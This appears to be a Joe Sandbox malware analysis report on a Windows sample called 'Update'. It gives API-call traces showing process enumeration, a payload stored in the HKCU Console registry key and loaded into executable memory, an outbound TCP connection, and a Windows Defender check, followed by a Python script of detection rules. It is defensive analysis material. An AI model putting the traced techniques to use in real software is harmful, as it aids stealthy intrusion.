                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFactoryXinvalid_argumentstd::_swprintf
                                                                                            • String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
                                                                                            • API String ID: 3803070356-257307503
                                                                                            APIs
                                                                                              • Part of subcall function 6C381070: SetFileAttributesA.KERNEL32(?,00000001,?,0000000A,00000000,?,00000022,00000040,00000001), ref: 6C381124
                                                                                              • Part of subcall function 6C381070: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C38115F
                                                                                            • Sleep.KERNEL32(000000C8), ref: 6C382B0D
                                                                                            • _strlen.LIBCMT ref: 6C382B53
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFileIos_base_dtorSleep_strlenstd::ios_base::_
                                                                                            • String ID: $,$jIk
                                                                                            • API String ID: 3921760320-2946808363
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen
                                                                                            • String ID: $,$SPV$jIk
                                                                                            • API String ID: 4218353326-3917736278
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,034E7523), ref: 034E743D
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 034E7444
                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,034E7523), ref: 034E7452
                                                                                            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,034E7523), ref: 034E745A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: InfoSystem$AddressHandleModuleNativeProc
                                                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                            • API String ID: 3433367815-192647395
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 034E607C
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 034E6088
                                                                                            • Process32FirstW.KERNEL32(00000000,00000000), ref: 034E60B9
                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 034E610F
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 034E6116
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
                                                                                            • String ID:
                                                                                            • API String ID: 2526126748-0
                                                                                            • Opcode ID: d3b5f5fb82ad442a57154405a4909d3b5573550a4de3047a80a1269ec7a9d46f
                                                                                            • Instruction ID: c1a8a5de57d647ee502e94d265c2e2eb2e25647ad5cda56ce7eba3dbf41a18cd
                                                                                            • Opcode Fuzzy Hash: d3b5f5fb82ad442a57154405a4909d3b5573550a4de3047a80a1269ec7a9d46f
                                                                                            • Instruction Fuzzy Hash: FA21FC316001249BDB20EF74DC59BEEB3B9EF24316F05469ADC199B2C0EB369B05C654
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time_memmovetime
                                                                                            • String ID:
                                                                                            • API String ID: 1463837790-0
                                                                                            • Opcode ID: 3f883db18596281f11663a316cf5be669539ab74b6528e19f735a6cf8c9abb32
                                                                                            • Instruction ID: ff8cf09f8af4066d75cea47da57d2f976dd6d6b5694e7d5ca78d7313f50d8bd9
                                                                                            • Opcode Fuzzy Hash: 3f883db18596281f11663a316cf5be669539ab74b6528e19f735a6cf8c9abb32
                                                                                            • Instruction Fuzzy Hash: C351B27A700201AFD712CF6AC8C0E6BF7A9BF4821571886AEE9198F704D731F851CB94

                                                                                             Control-flow Graph: function at 100054c0 (rendered graph omitted; legend: Executed / Not Executed)
                                                                                            APIs
                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,00020019,?), ref: 10005507
                                                                                            • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 1000552E
                                                                                            • _memset.LIBCMT ref: 10005548
                                                                                            • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 10005563
                                                                                            • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 10005586
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 100055B1
                                                                                            • VirtualFree.KERNEL32(03040000,00000000,00008000), ref: 10005605
                                                                                            • _memset.LIBCMT ref: 10005669
                                                                                            • _memset.LIBCMT ref: 1000568D
                                                                                            • _memset.LIBCMT ref: 1000569F
                                                                                            • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 10005726
                                                                                            • RegCreateKeyW.ADVAPI32(80000001,Console\0,?), ref: 10005799
                                                                                            • RegDeleteValueW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4), ref: 100057AC
                                                                                            • RegSetValueExW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000065), ref: 100057C4
                                                                                            • RegCloseKey.KERNEL32(?), ref: 100057CE
                                                                                            • Sleep.KERNEL32(00000BB8), ref: 100057FE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value_memset$Virtual$AllocCloseQuery$CreateDeleteFreeOpenSleep
                                                                                            • String ID: !jWW$.$0d3b34577c0a66584d5bdc849e214016$9e9e85e05ee16fc372a0c7df6549fbd4$Console\0$_$e$i$l${vU_
                                                                                            • API String ID: 354323817-737951744
                                                                                            • Opcode ID: be3d857457f6c34cc49a9ce7b94368c024c206f60fa141a8346ca6c642e4ce58
                                                                                            • Instruction ID: 005816a77294032e0ea7aedf6318117014c310f5a4f2017eaf50af4860f80873
                                                                                            • Opcode Fuzzy Hash: be3d857457f6c34cc49a9ce7b94368c024c206f60fa141a8346ca6c642e4ce58
                                                                                            • Instruction Fuzzy Hash: 5891D475A00718ABF710CF60CC84FAB77BAFB88741F508158FA089B245DB75EA40CB51

                                                                                             Control-flow Graph: function at 34e9e50 (rendered graph omitted; legend: Executed / Not Executed)
                                                                                            APIs
                                                                                            • GdipGetImagePixelFormat.GDIPLUS(Function_00009A30,?,?,00000000), ref: 034E9E7B
                                                                                            • GdipGetImageHeight.GDIPLUS(Function_00009A30,?,?,00000000), ref: 034E9EFC
                                                                                            • GdipGetImageWidth.GDIPLUS(Function_00009A30,?,?,00000000), ref: 034E9F24
                                                                                            • GdipGetImagePaletteSize.GDIPLUS(Function_00009A30,?,?,00000000), ref: 034E9F7F
                                                                                            • _malloc.LIBCMT ref: 034E9FC0
                                                                                              • Part of subcall function 034EF673: __FF_MSGBANNER.LIBCMT ref: 034EF68C
                                                                                              • Part of subcall function 034EF673: __NMSG_WRITE.LIBCMT ref: 034EF693
                                                                                              • Part of subcall function 034EF673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C,034F8E76), ref: 034EF6B8
                                                                                            • _free.LIBCMT ref: 034EA000
                                                                                            • GdipGetImagePalette.GDIPLUS(?,00000008,?,?,00000000), ref: 034EA028
                                                                                            • SetDIBColorTable.GDI32(?,00000000,?,?,?,00000000), ref: 034EA0B7
                                                                                            • GdipBitmapLockBits.GDIPLUS(Function_00009A30,?,00000001,?,?,?,00000000), ref: 034EA112
                                                                                            • _free.LIBCMT ref: 034EA134
                                                                                            • _memcpy_s.LIBCMT ref: 034EA183
                                                                                            • GdipBitmapUnlockBits.GDIPLUS(?,?,?,00000000), ref: 034EA1D0
                                                                                            • GdipCreateBitmapFromScan0.GDIPLUS(?,?,03505A78,00022009,?,00000000,?,00000000), ref: 034EA22C
                                                                                            • GdipGetImageGraphicsContext.GDIPLUS(00000000,00022009,?,00000000), ref: 034EA24C
                                                                                            • GdipDrawImageI.GDIPLUS(00000000,Function_00009A30,00000000,00000000,?,00000000), ref: 034EA267
                                                                                            • GdipDeleteGraphics.GDIPLUS(?,?,00000000), ref: 034EA274
                                                                                            • GdipDisposeImage.GDIPLUS(00000000,?,00000000), ref: 034EA27B
                                                                                            • _free.LIBCMT ref: 034EA296
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Gdip$Image$Bitmap_free$BitsGraphicsPalette$AllocateColorContextCreateDeleteDisposeDrawFormatFromHeapHeightLockPixelScan0SizeTableUnlockWidth_malloc_memcpy_s
                                                                                            • String ID: &
                                                                                            • API String ID: 640422297-3042966939
                                                                                            • Opcode ID: 568ca693d89fef5fff2c6593fac74c86bd4a25f796c0abbb46885ed777dd9d3d
                                                                                            • Instruction ID: fbd34261c7d2621fd43996d527dfe9f583a6bbea983c09fc97674f11abc95840
                                                                                            • Opcode Fuzzy Hash: 568ca693d89fef5fff2c6593fac74c86bd4a25f796c0abbb46885ed777dd9d3d
                                                                                            • Instruction Fuzzy Hash: C5D164F1A002199FDB20DF55CC84B9AB7B4FF48305F0485AEE609AB351D734A985CF69

                                                                                            APIs
                                                                                            • ResetEvent.KERNEL32(?), ref: 034E2DBB
                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 034E2DC7
                                                                                            • timeGetTime.WINMM ref: 034E2DCD
                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 034E2DFA
                                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 034E2E26
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 034E2E32
                                                                                            • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 034E2E51
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 034E2E5D
                                                                                            • gethostbyname.WS2_32(00000000), ref: 034E2E6B
                                                                                            • htons.WS2_32(?), ref: 034E2E8D
                                                                                            • connect.WS2_32(?,?,00000010), ref: 034E2EAB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                            • String ID: 0u
                                                                                            • API String ID: 640718063-3203441087
                                                                                            • Opcode ID: d2527bfc698f6fe0659267c2a9ce8cfe84560e93cb5defd9cc29a9959abb46c6
                                                                                            • Instruction ID: c03d76af44b17f6dcb88389c5652f593725e500c493cb1ab721f911bff325094
                                                                                            • Opcode Fuzzy Hash: d2527bfc698f6fe0659267c2a9ce8cfe84560e93cb5defd9cc29a9959abb46c6
                                                                                            • Instruction Fuzzy Hash: 7D619071A40304AFE720EFA4DC45FABB7B8FF48B05F10491EF645AB2D0D6B1A9059B64

                                                                                            APIs
                                                                                            • ResetEvent.KERNEL32(?), ref: 10002D9B
                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 10002DA7
                                                                                            • timeGetTime.WINMM ref: 10002DAD
                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 10002DDA
                                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 10002E06
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 10002E12
                                                                                            • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 10002E31
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 10002E3D
                                                                                            • gethostbyname.WS2_32(00000000), ref: 10002E4B
                                                                                            • htons.WS2_32(?), ref: 10002E6D
                                                                                            • connect.WS2_32(?,?,00000010), ref: 10002E8B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                            • String ID: 0u
                                                                                            • API String ID: 640718063-3203441087
                                                                                            • Opcode ID: 94c689521af4947466c8b86645af49a3b04e56d54b71338c9307917d991564e9
                                                                                            • Instruction ID: d5696d751933d4553be470da2890fc26df070c3c16b6f4ec0f7763c80930fe30
                                                                                            • Opcode Fuzzy Hash: 94c689521af4947466c8b86645af49a3b04e56d54b71338c9307917d991564e9
                                                                                            • Instruction Fuzzy Hash: 136152B1A40304BFE710DFA4CC85FAAB7B9FF49711F104629F646AB2D0D7B1A9048B64
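The API listings in the function cards above carry the evidence an analyst turns into triage rules: a Toolhelp32 process walk (CreateToolhelp32Snapshot with TH32CS_SNAPPROCESS, then Process32FirstW/NextW), a REG_BINARY value written under HKCU\Console\0 in the same function that calls VirtualAlloc with PAGE_EXECUTE_READWRITE (0x40), and a socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) / gethostbyname / connect chain. The Python below is an added example and is not code from Joe Sandbox or from the sample: it parses lines in the report's "• Name.MODULE(args), ref: addr" format into records and applies four behaviour rules. The sample input is copied from the listings on this page; the rule names and the assumption that the textual format is stable across cards are the example's own.

```python
"""Triage rules over Joe Sandbox 'APIs' listings (added example, not Joe Sandbox code).

Parses lines such as
    • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 10005586
    • Part of subcall function 034EF673: RtlAllocateHeap.NTDLL(...), ref: 034EF6B8
and applies four behaviour rules. Rule names are this example's own, not Joe Sandbox signatures.
"""
import re
from dataclasses import dataclass
from typing import Optional

CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>[\w.]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Win32 / Winsock constants the rules compare against.
PAGE_EXECUTE_READWRITE = 0x40
TH32CS_SNAPPROCESS = 0x2
HKEY_CURRENT_USER = 0x80000001
REG_BINARY = 0x3
AF_INET, SOCK_STREAM, IPPROTO_TCP = 2, 1, 6


@dataclass
class ApiCall:
    name: str
    module: str
    args: list              # argument strings as printed; '?' means not recovered
    ref: str                # call-site address
    subcall: Optional[str]  # callee address for 'Part of subcall function' lines


def hexarg(arg: str) -> Optional[int]:
    """'00000040' -> 0x40, '00000019(TokenIntegrityLevel)' -> 0x19, '?' or a string -> None."""
    m = re.match(r"^([0-9A-Fa-f]{1,8})(?:\(.*\))?$", arg.strip())
    return int(m.group(1), 16) if m else None


def parse_api_listing(text: str) -> list:
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue  # headings such as 'APIs' or 'Memory Dump Source'
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args, m.group("ref"), m.group("sub")))
    return calls


def triage(calls: list) -> list:
    """Return (rule, detail) tuples for one function's API calls."""
    findings = []
    names = {c.name for c in calls}
    by_name = {}
    for c in calls:
        by_name.setdefault(c.name, []).append(c)

    # 1. Toolhelp32 process walk: TH32CS_SNAPPROCESS snapshot plus Process32First*.
    for c in by_name.get("CreateToolhelp32Snapshot", []):
        flags = hexarg(c.args[0]) if c.args else None
        if flags is not None and flags & TH32CS_SNAPPROCESS and names & {"Process32FirstW", "Process32First"}:
            findings.append(("process_enumeration", f"Toolhelp32 process walk at ref {c.ref}"))

    # 2. RWX memory: VirtualAlloc whose flProtect (4th argument) is PAGE_EXECUTE_READWRITE.
    for c in by_name.get("VirtualAlloc", []):
        if len(c.args) >= 4 and hexarg(c.args[3]) == PAGE_EXECUTE_READWRITE:
            size = hexarg(c.args[1])
            findings.append(("rwx_allocation",
                             f"VirtualAlloc PAGE_EXECUTE_READWRITE, size {'?' if size is None else hex(size)} at ref {c.ref}"))

    # 3. REG_BINARY blob written under an HKCU key that this same function opened or created.
    hkcu_keys = [c.args[1] for c in by_name.get("RegOpenKeyExW", []) + by_name.get("RegCreateKeyW", [])
                 if len(c.args) >= 2 and hexarg(c.args[0]) == HKEY_CURRENT_USER]
    for c in by_name.get("RegSetValueExW", []):
        if hkcu_keys and len(c.args) >= 6 and hexarg(c.args[3]) == REG_BINARY:
            findings.append(("registry_blob_store",
                             f"REG_BINARY value '{c.args[1]}' ({hexarg(c.args[5])} bytes) under HKCU\\{hkcu_keys[0]} at ref {c.ref}"))

    # 4. Outbound TCP: socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) with a connect in the same function.
    for c in by_name.get("socket", []):
        if [hexarg(a) for a in c.args[:3]] == [AF_INET, SOCK_STREAM, IPPROTO_TCP] and "connect" in names:
            via = ", host resolved with gethostbyname" if "gethostbyname" in names else ""
            findings.append(("tcp_connect_out", f"TCP socket + connect at ref {c.ref}{via}"))
    return findings


def triage_report(listings: dict) -> dict:
    return {fn: triage(parse_api_listing(text)) for fn, text in listings.items()}


# Input lines copied from the API listings on this page, grouped by function card.
SAMPLE_LISTINGS = {
    "process_walk": r"""
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 034E6088
• Process32FirstW.KERNEL32(00000000,00000000), ref: 034E60B9
• Process32NextW.KERNEL32(00000000,0000022C), ref: 034E610F
""",
    "registry_config": r"""
• RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,00020019,?), ref: 10005507
• VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 10005586
• RegSetValueExW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000065), ref: 100057C4
""",
    "connect": r"""
• socket.WS2_32(00000002,00000001,00000006), ref: 034E2DFA
• gethostbyname.WS2_32(00000000), ref: 034E2E6B
• connect.WS2_32(?,?,00000010), ref: 034E2EAB
""",
}

if __name__ == "__main__":
    for fn, found in triage_report(SAMPLE_LISTINGS).items():
        for rule, detail in found:
            print(f"{fn}: {rule}: {detail}")
```

Rule 3 is deliberately scoped to a single function card: the registry key and the REG_BINARY write have to appear in the same listing, which is what makes the HKCU\Console\0 value above look like configuration staging rather than ordinary console settings. Rule 2 reports the allocation size (0x311BF here) because an RWX region of that size alongside registry reads is the shape of a stage being decoded into memory.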

                                                                                             Control-flow Graph: function at 34e6a70 (rendered graph omitted; legend: Executed / Not Executed)
                                                                                            APIs
                                                                                            • GetCurrentProcessId.KERNEL32(75BF73E0), ref: 034E6A94
                                                                                            • wsprintfW.USER32 ref: 034E6AA7
                                                                                              • Part of subcall function 034E6910: GetCurrentProcessId.KERNEL32(DF800B7B,00000000,00000000,75BF73E0,?,00000000,035010DB,000000FF,?,034E6AB3,00000000), ref: 034E6938
                                                                                              • Part of subcall function 034E6910: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,035010DB,000000FF,?,034E6AB3,00000000), ref: 034E6947
                                                                                              • Part of subcall function 034E6910: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,035010DB,000000FF,?,034E6AB3,00000000), ref: 034E6960
                                                                                              • Part of subcall function 034E6910: CloseHandle.KERNEL32(00000000,?,00000000,035010DB,000000FF,?,034E6AB3,00000000), ref: 034E696B
                                                                                            • _memset.LIBCMT ref: 034E6AC2
                                                                                            • GetVersionExW.KERNEL32(?), ref: 034E6ADB
                                                                                            • GetCurrentProcess.KERNEL32(00000008,?), ref: 034E6B12
                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 034E6B19
                                                                                            • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 034E6B3F
                                                                                            • GetLastError.KERNEL32 ref: 034E6B49
                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 034E6B5D
                                                                                            • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 034E6B85
                                                                                            • GetSidSubAuthorityCount.ADVAPI32 ref: 034E6B98
                                                                                            • GetSidSubAuthority.ADVAPI32(00000000), ref: 034E6BA6
                                                                                            • LocalFree.KERNEL32(?), ref: 034E6BB5
                                                                                            • CloseHandle.KERNEL32(?), ref: 034E6BC2
                                                                                            • wsprintfW.USER32 ref: 034E6C1B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion_memset
                                                                                            • String ID: -N/$NO/$None/%s
                                                                                            • API String ID: 3036438616-3095023699
                                                                                            • Opcode ID: 2a58897ad59ba66bb6569a8d24d3aba712690ab7e47a1dda4449a7be3fb27772
                                                                                            • Instruction ID: 8b2f407b583f7a0b05814e610a78f3cb9888454b1b48ddb91432fc16d45e7492
                                                                                            • Opcode Fuzzy Hash: 2a58897ad59ba66bb6569a8d24d3aba712690ab7e47a1dda4449a7be3fb27772
                                                                                            • Instruction Fuzzy Hash: B5410870900328AFDB20DB61DD88FEF777CEB09306F05449AF6059A251DA39D985CF65

                                                                                            Control-flow Graph
                                                                                            APIs
                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 034EAD53
                                                                                            • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 034EAD73
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: OpenQueryValue
                                                                                            • String ID: %s_bin$Console$Console\0$IpDatespecial
                                                                                            • API String ID: 4153817207-1338088003
                                                                                            • Opcode ID: 90a4f54633eb1f2bf160212d9dda8b91b98d02d9bb52673cfb5d4f6e6da672a0
                                                                                            • Instruction ID: 1ee12bc365887a4f66ac5c7342be5b9d9dd08ab8c6144bb94c6341f25486e513
                                                                                            • Opcode Fuzzy Hash: 90a4f54633eb1f2bf160212d9dda8b91b98d02d9bb52673cfb5d4f6e6da672a0
                                                                                            • Instruction Fuzzy Hash: 29C1D1B5A00300AFE710EF24DC45F6BB3A8EF94715F08056EE9459F381E675E909C7AA

                                                                                            Control-flow Graph
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 034E618B
                                                                                            • lstrcatW.KERNEL32(03511F10,0350510C,?,DF800B7B,00000AD4,00000000,75BF73E0), ref: 034E61CD
                                                                                            • lstrcatW.KERNEL32(03511F10,0350535C,?,DF800B7B,00000AD4,00000000,75BF73E0), ref: 034E61D9
                                                                                            • CoCreateInstance.OLE32(03502480,00000000,00000017,0350578C,?,?,DF800B7B,00000AD4,00000000,75BF73E0), ref: 034E6220
                                                                                            • _memset.LIBCMT ref: 034E62CE
                                                                                            • wsprintfW.USER32 ref: 034E6336
                                                                                            • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 034E635F
                                                                                            • _memset.LIBCMT ref: 034E6376
                                                                                              • Part of subcall function 034E6050: _memset.LIBCMT ref: 034E607C
                                                                                              • Part of subcall function 034E6050: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 034E6088
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _memset$Createlstrcat$InstanceOpenSnapshotToolhelp32wsprintf
                                                                                            • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                                            • API String ID: 1221949200-1583895642
                                                                                            • Opcode ID: 4ed7a80d0f8710bbbc1bd941311cb86661e877bd36c4d008b9ba0f335df92a50
                                                                                            • Instruction ID: 097e77e83873ae0f04a5666b469bcdd0bbb977d94aeac659084134999c89b3f4
                                                                                            • Opcode Fuzzy Hash: 4ed7a80d0f8710bbbc1bd941311cb86661e877bd36c4d008b9ba0f335df92a50
